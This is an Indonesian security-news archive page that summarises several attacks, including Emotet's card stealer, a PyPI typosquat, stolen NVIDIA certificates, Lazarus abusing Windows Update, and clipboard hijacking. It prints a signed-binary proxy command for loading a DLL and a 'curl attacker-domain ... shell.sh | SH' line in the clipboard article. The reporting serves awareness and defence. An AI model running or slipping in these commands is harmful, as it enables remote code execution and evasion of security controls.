Naga Cyber Defense

Trusted Security for all of Indonesia

You are here: Home / Archives for Threat / Attack technique

Attack technique

Malware Emotet sekarang mencuri kartu kredit dari pengguna Google Chrome

by

Botnet Emotet sekarang mencoba menginfeksi calon korban dengan modul pencuri kartu kredit yang dirancang untuk mengumpulkan informasi kartu kredit yang disimpan di profil pengguna Google Chrome.

Setelah mencuri info kartu kredit (yaitu, nama, bulan dan tahun kedaluwarsa, nomor kartu), malware akan mengirimkannya ke server command-and-control (C2) yang berbeda dari yang digunakan modul pencuri kartu Emotet.

“Pada 6 Juni, Proofpoint mengamati modul Emotet baru dijatuhkan oleh botnet E4,” kata tim Proofpoint Threat Insights.

“Yang mengejutkan kami, itu adalah pencuri kartu kredit yang hanya menargetkan browser Chrome. Setelah detail kartu dikumpulkan, mereka dipindahkan ke server C2 yang berbeda dari pemuat modul.”

Perubahan perilaku ini terjadi setelah peningkatan aktivitas selama bulan April dan peralihan ke modul 64-bit, seperti yang terlihat oleh kelompok riset keamanan Cryptolaemus.

Satu minggu kemudian, Emotet mulai menggunakan file pintasan Windows (.LNK) untuk menjalankan perintah PowerShell untuk menginfeksi perangkat korban, menjauh dari makro Microsoft Office yang sekarang dinonaktifkan secara default mulai awal April 2022.

Malware Emotet dikembangkan dan disebarkan dalam serangan sebagai trojan perbankan pada tahun 2014. Malware Emotet telah berkembang menjadi botnet yang digunakan kelompok ancaman TA542 (alias Mummy Spider) untuk mengirimkan muatan tahap kedua.

Ini juga memungkinkan operatornya untuk mencuri data pengguna, melakukan pengintaian pada jaringan yang dilanggar, dan bergerak secara lateral ke perangkat yang rentan.

Emotet dikenal karena menjatuhkan muatan trojan malware Qbot dan Trickbot pada komputer korban yang disusupi, yang digunakan untuk menyebarkan malware tambahan, termasuk suar Cobalt Strike dan ransomware seperti Ryuk dan Conti.

Selengkapnya: Bleeping Computer

Paket Repositori Python Berbahaya Mendistribusikan Cobalt Strike pada Sistem Windows, macOS & Linux

by

Repositori publik open-source adalah bagian penting dari suply chain perangkat lunak yang digunakan banyak organisasi untuk membangun aplikasi. Oleh karena itu, mereka menjadi target yang menarik bagi musuh yang ingin mendistribusikan malware ke audiens massal.

Contoh kasus terbaru adalah paket berbahaya untuk mendistribusikan Cobalt Strike pada sistem Windows, macOS, dan Linux, yang diunggah ke registri Python Package Index (PyPI) yang banyak digunakan untuk pengembang aplikasi Python. Paket “pymafka” memiliki nama yang sangat mirip dengan “PyKafka,” klien Apache Kafka populer untuk Python yang telah diunduh lebih dari 4,2 juta kali sejauh ini.

Lebih dari 300 pengguna tertipu untuk mengunduh paket berbahaya, mengira itu adalah kode yang sah, sebelum peneliti di Sonatype menemukan masalah tersebut dan melaporkannya ke registri PyPI. Sejak itu telah dihapus, tetapi aplikasi yang memasukkan skrip berbahaya tetap menjadi ancaman.

“Jumlah unduhan untuk paket berbahaya termasuk unduhan otomatis yang diprakarsai oleh mirror dan bot selain unduhan yang dimulai oleh pengguna,” kata Ax Sharma, peneliti keamanan di Sonatype.

Menurutnya, unduhan yang melibatkan pengguna yang salah mengetik “pymafka” dan bukan “pykafka” kemungkinan jumlahnya kurang dari 100. “Secara intuitif, tampaknya dampak dari serangan typosquatting terbatas pada satu pengguna yang membuat kesalahan ejaan,” katanya.

“Tetapi segalanya menjadi rumit ketika pengembang salah mengeja nama dependensi di perpustakaan mereka, dan perpustakaan mereka selanjutnya digunakan sebagai dependensi dalam proyek perangkat lunak pihak ketiga lainnya,” katanya. Pengguna aplikasi lain ini kemudian secara otomatis terinfeksi dengan proyek yang salah ketik, tanpa mengambil tindakan atau membuat kesalahan.

Selengkapnya: Dark Reading

Malware sekarang menggunakan sertifikat penandatanganan kode NVIDIA yang dicuri

by

Pelaku ancaman menggunakan sertifikat penandatanganan kode NVIDIA yang dicuri untuk menandatangani malware agar tampak tepercaya dan memungkinkan driver jahat dimuat di Windows.

Minggu ini, NVIDIA mengonfirmasi bahwa mereka mengalami serangan siber yang memungkinkan pelaku ancaman mencuri kredensial karyawan dan data kepemilikan.

Kelompok pemerasan, yang dikenal sebagai Lapsus$, menyatakan bahwa mereka mencuri 1TB data selama serangan dan mulai membocorkan data secara online setelah NVIDIA menolak untuk bernegosiasi dengan mereka.

Setelah Lapsus$ membocorkan sertifikat penandatanganan kode NVIDIA, peneliti keamanan dengan cepat menemukan bahwa sertifikat tersebut digunakan untuk menandatangani malware dan alat lain yang digunakan oleh pelaku ancaman.

Menurut sampel yang diunggah ke layanan pemindaian malware VirusTotal, sertifikat yang dicuri digunakan untuk menandatangani berbagai malware dan alat peretasan, seperti suar Cobalt Strike, Mimikatz, pintu belakang, dan trojan akses jarak jauh.

Misalnya, satu aktor ancaman menggunakan sertifikat untuk menandatangani trojan akses jarak jauh Quasar [VirusTotal], sementara orang lain menggunakan sertifikat untuk menandatangani driver Windows [VirusTotal].

Selengkapnya: Bleeping Computer

AS mengatakan peretas negara Rusia mengintai di jaringan kontraktor pertahanan selama berbulan-bulan

by

Peretas yang didukung oleh pemerintah Rusia telah menembus jaringan beberapa kontraktor pertahanan AS dalam kampanye berkelanjutan yang telah mengungkapkan informasi sensitif tentang infrastruktur komunikasi pengembangan senjata AS, kata pemerintah federal pada hari Rabu.

Kampanye dimulai pada Januari 2020 dan berlanjut hingga bulan ini, menurut penasihat bersama oleh FBI, Badan Keamanan Nasional, dan Badan Keamanan Cybersecurity dan Infrastruktur. Para peretas telah menargetkan dan berhasil meretas kontraktor pertahanan yang dibersihkan, atau CDC, yang mendukung kontrak untuk Departemen Pertahanan AS dan komunitas intelijen.

“Selama periode dua tahun ini, para aktor ini telah mempertahankan akses terus-menerus ke beberapa jaringan CDC, dalam beberapa kasus setidaknya selama enam bulan,” tulis para pejabat dalam nasihat tersebut. “Dalam kasus ketika para aktor telah berhasil memperoleh akses, FBI, NSA, dan CISA telah mencatat pemusnahan email dan data secara teratur dan berulang. Misalnya, pada saat kompromi pada tahun 2021, pelaku ancaman melakukan eksfiltrasi ratusan dokumen terkait produk perusahaan, hubungan dengan negara lain, serta personel internal dan masalah hukum.”

Dokumen-dokumen yang diekstraksi telah memasukkan informasi eksklusif CDC dan dikendalikan ekspor yang tidak terklasifikasi. Informasi ini memberikan pemerintah Rusia “wawasan yang signifikan” ke dalam pengembangan platform senjata AS dan jadwal waktu penyebaran, rencana infrastruktur komunikasi, dan teknologi khusus yang digunakan oleh pemerintah dan militer AS. Dokumen tersebut juga mencakup email yang tidak diklasifikasikan di antara karyawan dan pelanggan pemerintah mereka yang membahas perincian kepemilikan tentang penelitian teknologi dan ilmiah.

Para peretas telah menggunakan berbagai metode untuk menembus target mereka. Metodenya termasuk memanen kata sandi jaringan melalui spear-phishing, pelanggaran data, teknik cracking, dan eksploitasi kerentanan perangkat lunak yang belum ditambal.

Setelah mendapatkan pijakan di jaringan yang ditargetkan, pelaku ancaman meningkatkan hak sistem mereka dengan memetakan Direktori Aktif dan menghubungkan ke pengontrol domain. Dari sana, mereka dapat mengekstrak kredensial untuk semua akun lain dan membuat akun baru.

Peretas menggunakan server pribadi virtual untuk mengenkripsi komunikasi mereka dan menyembunyikan identitas mereka, tambah penasihat itu. Mereka juga menggunakan perangkat “kantor kecil dan kantor rumah (SOHO), sebagai simpul operasional untuk menghindari deteksi.” Pada tahun 2018, Rusia ketahuan menginfeksi lebih dari 500.000 router konsumen sehingga perangkat tersebut dapat digunakan untuk menginfeksi jaringan tempat mereka terhubung, mengekstrak kata sandi, dan memanipulasi lalu lintas yang melewati perangkat yang disusupi.

“Dalam beberapa kasus, pelaku ancaman mempertahankan akses terus-menerus selama setidaknya enam bulan,” kata penasihat bersama. “Meskipun para pelaku telah menggunakan berbagai malware untuk mempertahankan persistensi, FBI, NSA, dan CISA juga telah mengamati intrusi yang tidak bergantung pada malware atau mekanisme persistensi lainnya. Dalam kasus ini, kemungkinan pelaku ancaman mengandalkan kepemilikan kredensial yang sah untuk bertahan, memungkinkan mereka untuk beralih ke akun lain, sesuai kebutuhan, untuk mempertahankan akses ke lingkungan yang disusupi.”

Penasihat berisi daftar indikator teknis yang dapat digunakan admin untuk menentukan apakah jaringan mereka telah disusupi dalam kampanye. Selanjutnya mendesak semua CDC untuk menyelidiki aktivitas mencurigakan di lingkungan perusahaan dan cloud mereka.

Sumber : Arstechnica

Peretas Menggunakan Trik Registrasi Perangkat untuk Menyerang Perusahaan dengan Phishing Lateral

by

Microsoft telah mengungkapkan rincian kampanye phishing multi-fase skala besar yang menggunakan kredensial curian untuk mendaftarkan perangkat di jaringan korban untuk menyebarkan email spam lebih lanjut dan memperluas kumpulan infeksi.

Raksasa teknologi itu mengatakan serangan itu diwujudkan melalui akun yang tidak diamankan menggunakan otentikasi multi-faktor (MFA), sehingga memungkinkan musuh untuk memanfaatkan kebijakan bawa perangkat Anda sendiri (BYOD) target dan memperkenalkan kebijakan mereka sendiri. perangkat jahat menggunakan kredensial yang dicuri.

Serangan itu terjadi dalam dua tahap. “Fase kampanye pertama melibatkan pencurian kredensial di organisasi target yang sebagian besar berlokasi di Australia, Singapura, Indonesia, dan Thailand,” kata Tim Intelijen Ancaman Pembela Microsoft 365 dalam laporan teknis yang diterbitkan minggu ini.

“Kredensial yang dicuri kemudian dimanfaatkan pada fase kedua, di mana penyerang menggunakan akun yang disusupi untuk memperluas pijakan mereka di dalam organisasi melalui phishing lateral serta di luar jaringan melalui spam keluar.”

Kampanye dimulai dengan pengguna menerima umpan phishing bermerek DocuSign yang berisi tautan, yang, setelah diklik, mengarahkan penerima ke situs web jahat yang menyamar sebagai halaman masuk Office 365 untuk mencuri kredensial.

Pencurian kredensial tidak hanya mengakibatkan kompromi lebih dari 100 kotak surat di berbagai perusahaan, tetapi juga memungkinkan penyerang untuk menerapkan aturan kotak masuk untuk menggagalkan deteksi. Ini kemudian diikuti oleh gelombang serangan kedua yang menyalahgunakan kurangnya perlindungan MFA untuk mendaftarkan perangkat Windows yang tidak dikelola ke instance Azure Active Directory (AD) perusahaan dan menyebarkan pesan berbahaya.

Selengkapnya: The Hacker News

Peretas mengambil alih akun CEO dengan aplikasi OAuth jahat

by

Analis ancaman telah mengamati kampanye baru bernama ‘OiVaVoii’, menargetkan eksekutif perusahaan dan manajer umum dengan aplikasi OAuth berbahaya dan umpan phishing khusus yang dikirim dari akun Office 365 yang dibajak.

Menurut laporan dari Proofpoint, kampanye tersebut masih berlangsung, meskipun Microsoft memantau aktivitas tersebut dan telah memblokir sebagian besar aplikasi.

Dampak dari pengambilalihan akun eksekutif berkisar dari pergerakan lateral pada jaringan dan phishing orang dalam hingga penyebaran ransomware dan insiden penyusupan email bisnis.

OAuth adalah standar untuk otentikasi dan otorisasi berbasis token, menghilangkan kebutuhan untuk memasukkan kata sandi akun.

Aplikasi yang menggunakan OAuth memerlukan izin khusus seperti izin baca dan tulis file, akses ke kalender dan email, serta otorisasi pengiriman email.

Tujuan dari sistem ini adalah untuk menawarkan peningkatan kegunaan dan kenyamanan sambil mempertahankan tingkat keamanan yang tinggi dalam lingkungan yang dapat dipercaya dengan mengurangi eksposur kredensial.

Dengan token OAuth, aplikasi pihak ketiga berbasis cloud dapat mengakses titik data yang diperlukan untuk menyediakan fitur produktivitas bisnis tanpa mendapatkan kata sandi pengguna.

Pelaku di balik kampanye OiVaVoii menggunakan setidaknya lima aplikasi OAuth berbahaya, empat di antaranya saat ini diblokir: ‘Upgrade’, ‘Document’, ‘Shared’, dan ‘UserInfo’.

Selengkapnya: Bleeping Computer

Peretas Lazarus menggunakan Pembaruan Windows untuk menyebarkan malware

by

Grup peretasan yang didukung Korea Utara, Lazarus, menambahkan klien Pembaruan Windows ke daftar binari yang hidup di luar negeri (LoLBins) dan sekarang secara aktif menggunakannya untuk mengeksekusi kode berbahaya pada sistem Windows.

Metode penyebaran malware baru ditemukan oleh tim Malwarebytes Threat Intelligence saat menganalisis kampanye spearphishing Januari yang meniru perusahaan keamanan dan kedirgantaraan Amerika Lockheed Martin.

Setelah korban membuka lampiran berbahaya dan mengaktifkan eksekusi makro, makro yang disematkan menjatuhkan file WindowsUpdateConf.lnk di folder startup dan file DLL (wuaueng.dll) di folder Windows/System32 yang tersembunyi.

Kemudian file LNK digunakan untuk meluncurkan klien WSUS / Pembaruan Windows (wuauclt.exe) untuk menjalankan perintah yang memuat DLL berbahaya penyerang.

Para peneliti menghubungkan serangan ini dengan Lazarus berdasarkan beberapa bukti, termasuk infrastruktur yang tumpang tindih, metadata dokumen, dan penargetan yang serupa dengan kampanye sebelumnya.

Aliran serangan (Malwarebytes)

Taktik ini ditemukan oleh peneliti MDSec David Middlehurst, yang menemukan bahwa penyerang dapat menggunakan klien Pembaruan Windows untuk mengeksekusi kode berbahaya pada sistem Windows 10.

Ini dapat dilakukan dengan memuat DLL yang dibuat secara khusus menggunakan opsi baris perintah berikut (perintah yang digunakan Lazarus untuk memuat muatan berbahayanya):

wuauclt.exe /UpdateDeploymentProvider [path_to_dll] /RunHandlerComServer

MITER ATT&CK mengklasifikasikan jenis strategi penghindaran pertahanan ini sebagai Signed Binary Proxy Execution, dan memungkinkan penyerang untuk melewati perangkat lunak keamanan, kontrol aplikasi, dan perlindungan validasi sertifikat digital.

Pelaku ancaman mengeksekusi kode berbahaya dari DLL berbahaya yang dijatuhkan sebelumnya, dimuat menggunakan biner bertanda tangan klien Pembaruan Windows.

Grup Lazarus (juga dilacak sebagai HIDDEN COBRA oleh agen intel AS) adalah grup peretas militer Korea Utara yang aktif selama lebih dari satu dekade, setidaknya sejak 2009.

Operatornya mengoordinasikan kampanye ransomware WannaCry global 2017 dan berada di balik serangan terhadap perusahaan terkenal seperti Sony Films dan beberapa bank di seluruh dunia.

Mereka juga diamati menggunakan pintu belakang ThreatNeedle yang sebelumnya tidak terdokumentasi dalam kampanye spionase dunia maya skala besar terhadap industri pertahanan lebih dari selusin negara.

Departemen Keuangan AS memberikan sanksi kepada tiga kelompok peretas yang disponsori DPRK (Lazarus, Bluenoroff, dan Andariel) pada September 2019, dan pemerintah AS menawarkan hadiah hingga $5 juta untuk info tentang aktivitas Lazarus.

Sumber : Bleeping Computer

Jangan salin tempel perintah dari halaman web — Anda bisa diretas

by

Baru-baru ini, Gabriel Friedlander, pendiri platform pelatihan kesadaran keamanan Wizer mendemonstrasikan peretasan yang jelas namun mengejutkan yang akan membuat Anda berhati-hati dalam menyalin-menempelkan perintah dari halaman web.

Friedlander memperingatkan sebuah halaman web dapat secara diam-diam mengganti konten dari apa yang ada di clipboard Anda, dan yang lebih buruk lagi pengembang mungkin hanya menyadari kesalahan mereka setelah menempelkan teks, dan pada saat itu mungkin sudah terlambat.

Dalam bukti konsep sederhana (PoC) yang diterbitkan di blognya, Friedlander meminta pembaca untuk menyalin perintah sederhana yang akan dikenal oleh sebagian besar sysadmin dan pengembang:

Halaman HTML Friedlander dengan perintah sederhana yang dapat Anda salin ke clipboard

Sekarang, tempelkan apa yang Anda salin dari blog Friedlander ke dalam kotak teks atau Notepad, dan hasilnya mungkin akan membuat Anda terkejut:

curl http://attacker-domain:8000/shell.sh | SH

Anda tidak hanya mendapatkan perintah yang sama sekali berbeda di clipboard Anda, tetapi untuk memperburuk keadaan, ia memiliki karakter baris baru (atau kembali) di akhir.

Mereka yang menempelkan teks mungkin mendapat kesan bahwa mereka menyalin perintah sudo apt update yang familier dan tidak berbahaya yang digunakan untuk mengambil informasi terbaru pada perangkat lunak yang diinstal pada sistem Anda.

Keajaibannya ada pada kode JavaScript yang tersembunyi di balik pengaturan halaman HTML PoC oleh Friedlander. Setelah Anda menyalin teks “sudo apt update” yang terdapat dalam elemen HTML, cuplikan kode, yang ditampilkan di bawah ini berjalan.

Apa yang terjadi setelahnya adalah ‘pendengar acara’ JavaScript yang menangkap peristiwa penyalinan dan mengganti data papan klip dengan kode uji berbahaya Friedlander:

Kode JavaScript PoC yang menggantikan konten clipboard

“Inilah mengapa Anda TIDAK PERNAH menyalin perintah tempel langsung ke terminal Anda,” Friedlander memperingatkan.

“Anda pikir Anda menyalin satu hal, tetapi itu diganti dengan sesuatu yang lain, seperti kode berbahaya. Yang diperlukan hanyalah satu baris kode yang disuntikkan ke dalam kode yang Anda salin untuk membuat pintu belakang ke aplikasi Anda.”

Seorang pengguna Reddit juga menyajikan contoh alternatif dari trik ini yang tidak memerlukan JavaScript: teks tak terlihat yang dibuat dengan gaya HTML dan CSS yang disalin ke clipboard Anda saat Anda menyalin bagian teks yang terlihat:

HTML yang tidak terlihat (kiri) diambil selama salin-tempel dan memiliki garis tambahan (kanan)

“Masalahnya bukan hanya situs web dapat mengubah konten clipboard Anda menggunakan JavaScript,” jelas pengguna, SwallowYourDreams.

“Bisa juga hanya menyembunyikan perintah dalam HTML yang tidak terlihat oleh mata manusia, tetapi akan disalin oleh komputer.”

Jadi, alasan lain untuk tidak pernah secara membabi buta mempercayai apa yang Anda salin dari halaman web—lebih baik tempel di editor teks terlebih dahulu.

Sumber : Bleeping Computer